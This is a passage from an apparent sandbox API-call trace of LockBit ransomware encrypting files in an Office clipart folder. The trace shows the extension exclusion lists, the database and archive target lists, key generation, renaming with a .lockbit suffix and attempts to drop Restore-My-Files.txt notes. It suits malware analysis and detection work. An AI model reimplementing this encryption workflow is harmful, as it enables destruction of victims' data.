(lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.911] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.911] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01246_.GIF.lockbit") returned 72 [0179.911] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01246_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01246_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0179.912] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.912] malloc (_Size=0x40068) returned 0x1ff1e60 [0179.912] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=462) returned 1 [0179.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0179.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0179.914] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0179.919] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01246_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01246_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.919] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.919] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0179.919] free (_Block=0x1fa2ed8) [0179.919] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01246_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.919] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.919] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.919] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7f5e00, ftCreationTime.dwHighDateTime=0x1bd4e68, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d7f5e00, ftLastWriteTime.dwHighDateTime=0x1bd4e68, nFileSizeHigh=0x0, nFileSizeLow=0xff7, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01253_.GIF", cAlternateFileName="")) returned 1 [0179.919] lstrcmpiW (lpString1=".", lpString2="WB01253_.GIF") returned -1 [0179.919] lstrcmpiW (lpString1="..", lpString2="WB01253_.GIF") returned -1 [0179.919] PathFindExtensionW (pszPath="WB01253_.GIF") returned=".GIF" [0179.920] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0179.920] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0179.920] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0179.921] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0179.921] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0179.921] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0179.921] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01253_.GIF") returned -1 [0179.921] lstrcmpiW (lpString1="ntldr", lpString2="WB01253_.GIF") returned -1 [0179.921] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01253_.GIF") returned -1 [0179.921] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01253_.GIF") returned -1 [0179.921] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01253_.GIF") returned -1 [0179.921] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01253_.GIF") returned -1 [0179.921] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01253_.GIF") returned -1 [0179.921] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.921] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01253_.GIF") returned=".GIF" [0179.922] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0179.922] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0179.922] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0179.922] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01253_.GIF.lockbit") returned 72 [0179.922] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01253_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01253_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0179.924] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.924] malloc (_Size=0x40068) returned 0x1ff1e60 [0179.924] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4087) returned 1 [0179.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0179.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0179.925] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0180.317] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01253_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01253_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.317] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.317] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.319] free (_Block=0x1fa2ed8) [0180.319] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01253_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.319] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.319] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9550b600, ftCreationTime.dwHighDateTime=0x1bd4e65, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9550b600, ftLastWriteTime.dwHighDateTime=0x1bd4e65, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01268_.GIF", cAlternateFileName="")) returned 1 [0180.319] lstrcmpiW (lpString1=".", lpString2="WB01268_.GIF") returned -1 [0180.319] lstrcmpiW (lpString1="..", lpString2="WB01268_.GIF") returned -1 [0180.319] PathFindExtensionW (pszPath="WB01268_.GIF") returned=".GIF" [0180.319] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.319] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.319] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.319] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.319] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.319] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.319] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.320] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.320] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.320] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.320] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.320] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.320] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.320] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.320] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.320] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.321] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01268_.GIF") returned -1 [0180.321] lstrcmpiW (lpString1="ntldr", lpString2="WB01268_.GIF") returned -1 [0180.321] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01268_.GIF") returned -1 [0180.321] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01268_.GIF") returned -1 [0180.321] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01268_.GIF") returned -1 [0180.321] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01268_.GIF") returned -1 [0180.321] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01268_.GIF") returned -1 [0180.321] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.321] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01268_.GIF") returned=".GIF" [0180.321] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.321] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.321] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.321] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.321] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.321] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.322] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.322] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.322] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.322] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.322] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.322] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.322] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.322] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.322] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.322] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.322] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01268_.GIF.lockbit") returned 72 [0180.322] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01268_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01268_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0180.324] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.324] malloc (_Size=0x40068) returned 0x3df0008 [0180.324] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=427) returned 1 [0180.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.324] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.325] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.325] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.329] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01268_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01268_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.329] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.329] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0180.329] free (_Block=0x1fa2ed8) [0180.329] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01268_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.329] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.329] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.329] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc336fa00, ftCreationTime.dwHighDateTime=0x1bd4e67, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc336fa00, ftLastWriteTime.dwHighDateTime=0x1bd4e67, nFileSizeHigh=0x0, nFileSizeLow=0x255, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01292_.GIF", cAlternateFileName="")) returned 1 [0180.329] lstrcmpiW (lpString1=".", lpString2="WB01292_.GIF") returned -1 [0180.329] lstrcmpiW (lpString1="..", lpString2="WB01292_.GIF") returned -1 [0180.329] PathFindExtensionW (pszPath="WB01292_.GIF") returned=".GIF" [0180.329] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.329] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.329] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.329] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.329] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.329] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.329] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.329] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.329] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.329] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.329] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.329] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.329] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.329] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.329] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.329] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.329] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.329] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.329] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.330] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.330] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.330] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.330] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW 